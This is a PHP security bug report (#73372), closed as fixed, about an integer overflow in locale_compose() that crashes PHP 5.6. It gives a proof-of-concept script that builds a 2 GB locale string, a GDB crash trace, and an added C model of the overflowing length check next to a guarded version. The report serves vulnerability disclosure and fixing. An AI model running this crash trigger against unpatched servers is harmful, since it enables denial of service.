Sec Bug #73372 crash in locale_compose() function
Submitted: 2016-10-22 10:12 UTC Modified: 2016-11-07 20:25 UTC
From: nguyenluan dot vnn at gmail dot com Assigned: stas (profile)
Status: Closed Package: intl (PECL)
PHP Version: 5.6.27 OS:
Private report: No CVE-ID: None

 [2016-10-22 10:12 UTC] nguyenluan dot vnn at gmail dot com
Description:
------------
Function locale_compose() could produce a string larger than 2 GB. Please refer to the test script and GDB output.

Test script:
---------------
<?php
    // Disable the memory limit so a 2 GB string can be built.
    ini_set('memory_limit', -1);

    // Language subtag of 0x7fffffff bytes; locale_compose() appends the other subtags.
    $str = str_repeat('a', 0x7fffffff);
    $arr = array(
        'language' => $str,
        'script'   => 'Hans',
        'region'   => 'CN',
        'variant2' => 'rozaj',
        'variant1' => 'nedis',
        'private1' => 'prv1',
        'private2' => 'prv2'
    );
    $str1 = locale_compose($arr);

    var_dump(strlen($str1));
?>

Expected result:
----------------
No crash. No string returned.

Actual result:
--------------
gdb-peda$ r ../test/string/test.php 
Starting program: /home/user/Desktop/php-5.6.27/sapi/cli/php ../test/string/test.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
int(-2147483617)  // string larger than 2Gb

Program received signal SIGSEGV, Segmentation fault.

 [----------------------------------registers-----------------------------------]
RAX: 0x7ffe6b66908f 
RBX: 0x0 
RCX: 0x10c89b8 ("/home/user/Desktop/php-5.6.27/Zend/zend_execute.h")
RDX: 0x7ffeeb669070 ('a' <repeats 200 times>...)
RSI: 0x10c89b8 ("/home/user/Desktop/php-5.6.27/Zend/zend_execute.h")
RDI: 0x7ffff7fba970 --> 0x7ffeeb669070 ('a' <repeats 200 times>...)
RBP: 0x7fffffffb9b0 --> 0x7fffffffb9e0 --> 0x7fffffffba10 --> 0x7fffffffba40 --> 0x7fffffffba60 --> 0x7fffffffba80 (--> ...)
RSP: 0x7fffffffb990 --> 0x7 
RIP: 0xa9b8be (<_zval_dtor_func+99>:	movzx  eax,BYTE PTR [rax])
R8 : 0x136 
R9 : 0x10c89b8 ("/home/user/Desktop/php-5.6.27/Zend/zend_execute.h")
R10: 0x86f 
R11: 0x7ffff3603730 --> 0xfffda400fffda12f 
R12: 0x444220 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffe1a0 --> 0x2 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xa9b8b6 <_zval_dtor_func+91>:	mov    eax,DWORD PTR [rax+0x8]
   0xa9b8b9 <_zval_dtor_func+94>:	cdqe   
   0xa9b8bb <_zval_dtor_func+96>:	add    rax,rdx
=> 0xa9b8be <_zval_dtor_func+99>:	movzx  eax,BYTE PTR [rax]
   0xa9b8c1 <_zval_dtor_func+102>:	test   al,al
   0xa9b8c3 <_zval_dtor_func+104>:	je     0xa9b8f2 <_zval_dtor_func+151>
   0xa9b8c5 <_zval_dtor_func+106>:	mov    rax,QWORD PTR [rbp-0x8]
   0xa9b8c9 <_zval_dtor_func+110>:	mov    rax,QWORD PTR [rax]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffb990 --> 0x7 
0008| 0x7fffffffb998 --> 0x4ff7f843f8 
0016| 0x7fffffffb9a0 --> 0x10c89b8 ("/home/user/Desktop/php-5.6.27/Zend/zend_execute.h")
0024| 0x7fffffffb9a8 --> 0x7ffff7fba970 --> 0x7ffeeb669070 ('a' <repeats 200 times>...)
0032| 0x7fffffffb9b0 --> 0x7fffffffb9e0 --> 0x7fffffffba10 --> 0x7fffffffba40 --> 0x7fffffffba60 --> 0x7fffffffba80 (--> ...)
0040| 0x7fffffffb9b8 --> 0xa8680d (<_zval_dtor+53>:	jmp    0xa86810 <_zval_dtor+56>)
0048| 0x7fffffffb9c0 ("/usr/local/lO")
0056| 0x7fffffffb9c8 --> 0x4f6c2f6c61 ('al/lO')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000a9b8be in _zval_dtor_func (zvalue=0x7ffff7fba970, 
    __zend_filename=0x10c89b8 "/home/user/Desktop/php-5.6.27/Zend/zend_execute.h", __zend_lineno=0x4f)
    at /home/user/Desktop/php-5.6.27/Zend/zend_variables.c:36
36				CHECK_ZVAL_STRING_REL(zvalue);

gdb-peda$ bt
#0  0x0000000000a9b8be in _zval_dtor_func (zvalue=0x7ffff7fba970, 
    __zend_filename=0x10c89b8 "/home/user/Desktop/php-5.6.27/Zend/zend_execute.h", __zend_lineno=0x4f)
    at /home/user/Desktop/php-5.6.27/Zend/zend_variables.c:36
#1  0x0000000000a8680d in _zval_dtor (zvalue=0x7ffff7fba970, 
    __zend_filename=0x10c89b8 "/home/user/Desktop/php-5.6.27/Zend/zend_execute.h", __zend_lineno=0x4f)
    at /home/user/Desktop/php-5.6.27/Zend/zend_variables.h:35
#2  0x0000000000a868d8 in i_zval_ptr_dtor (zval_ptr=0x7ffff7fba970, 
    __zend_filename=0x10caca0 "/home/user/Desktop/php-5.6.27/Zend/zend_variables.c", __zend_lineno=0xbc)
    at /home/user/Desktop/php-5.6.27/Zend/zend_execute.h:79
#3  0x0000000000a87bb1 in _zval_ptr_dtor (zval_ptr=0x7ffff7fbaa00, 
    __zend_filename=0x10caca0 "/home/user/Desktop/php-5.6.27/Zend/zend_variables.c", __zend_lineno=0xbc)
    at /home/user/Desktop/php-5.6.27/Zend/zend_execute_API.c:424
#4  0x0000000000a9be29 in _zval_ptr_dtor_wrapper (zval_ptr=0x7ffff7fbaa00)
    at /home/user/Desktop/php-5.6.27/Zend/zend_variables.c:188
#5  0x0000000000ab0cf9 in i_zend_hash_bucket_delete (
    ht=0x145cb28 <executor_globals+360>, p=0x7ffff7fba9e8)
    at /home/user/Desktop/php-5.6.27/Zend/zend_hash.c:182
#6  0x0000000000ab0dd1 in zend_hash_bucket_delete (
    ht=0x145cb28 <executor_globals+360>, p=0x7ffff7fba9e8)
    at /home/user/Desktop/php-5.6.27/Zend/zend_hash.c:192
#7  0x0000000000ab2ae4 in zend_hash_graceful_reverse_destroy (
    ht=0x145cb28 <executor_globals+360>)
    at /home/user/Desktop/php-5.6.27/Zend/zend_hash.c:613
#8  0x0000000000a873ad in shutdown_executor ()
    at /home/user/Desktop/php-5.6.27/Zend/zend_execute_API.c:244
#9  0x0000000000a9e177 in zend_deactivate ()
    at /home/user/Desktop/php-5.6.27/Zend/zend.c:960
#10 0x00000000009ff252 in php_request_shutdown (dummy=0x0)
    at /home/user/Desktop/php-5.6.27/main/main.c:1899
#11 0x0000000000b5cf24 in do_cli (argc=0x2, argv=0x1461630)
    at /home/user/Desktop/php-5.6.27/sapi/cli/php_cli.c:1181
#12 0x0000000000b5d7b6 in main (argc=0x2, argv=0x1461630)
    at /home/user/Desktop/php-5.6.27/sapi/cli/php_cli.c:1382
#13 0x00007ffff348f830 in __libc_start_main (main=0xb5cf99 <main>, argc=0x2, 
    argv=0x7fffffffe1a8, init=<optimized out>, fini=<optimized out>, 
    rtld_fini=<optimized out>, stack_end=0x7fffffffe198)
    at ../csu/libc-start.c:291
#14 0x0000000000444249 in _start ()

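An added C model of the length arithmetic behind the reported value (not PHP's code and not the reporter's script): the language subtag is 0x7fffffff bytes, the remaining subtags add 32 bytes, and a signed 32-bit PHP 5 string length cannot hold the sum. The joiner layout in kSuffixParts is an assumption; only its byte count matters here.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the report's length arithmetic. PHP 5 keeps a string's
 * length in a signed 32-bit int; the script's language subtag is 0x7fffffff
 * bytes and locale_compose() appends the other subtags, so the result no
 * longer fits. The joiner layout below is an assumption; only its byte
 * count (32) matters. */
static const char *const kSuffixParts[] = {
    "_Hans", "_CN", "_nedis", "_rozaj", "_x", "_prv1", "_prv2"
};
#define NPARTS (sizeof kSuffixParts / sizeof *kSuffixParts)

/* Unchecked: total computed in size_t, then stored as a 32-bit length the way
 * a PHP 5 zval does. Returns the wrapped value that strlen() reported. */
int32_t unchecked_compose_len(size_t language_len) {
    size_t total = language_len;
    for (size_t i = 0; i < NPARTS; i++)
        total += strlen(kSuffixParts[i]);
    uint32_t low = (uint32_t)total;         /* keep the low 32 bits */
    int32_t wrapped;
    memcpy(&wrapped, &low, sizeof wrapped); /* reinterpret as signed */
    return wrapped;
}

/* Checked: refuse any result whose length does not fit an int.
 * Returns the length, or -1 when appending would overflow. */
int32_t checked_compose_len(size_t language_len) {
    if (language_len > (size_t)INT_MAX) return -1;
    size_t total = language_len;
    for (size_t i = 0; i < NPARTS; i++) {
        size_t part = strlen(kSuffixParts[i]);
        if (part > (size_t)INT_MAX - total) return -1; /* overflow guard */
        total += part;
    }
    return (int32_t)total;
}

int main(void) {
    printf("unchecked: %d\n", (int)unchecked_compose_len(0x7fffffffu));
    printf("checked:   %d\n", (int)checked_compose_len(0x7fffffffu));
    printf("short tag: %d\n", (int)checked_compose_len(2));
    return 0;
}
```

The unchecked value equals the int(-2147483617) in the GDB session above; the checked variant rejects the input before any string is built or later destroyed with a negative length.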

History
 [2016-11-04 06:01 UTC] stas@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: stas
 [2016-11-04 06:01 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.
 [2016-11-07 08:43 UTC] nguyenluan dot vnn at gmail dot com
Since the bug is fixed can you mark "Private report" as "No"?

Thanks.
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Sat Dec 21 16:01:28 2024 UTC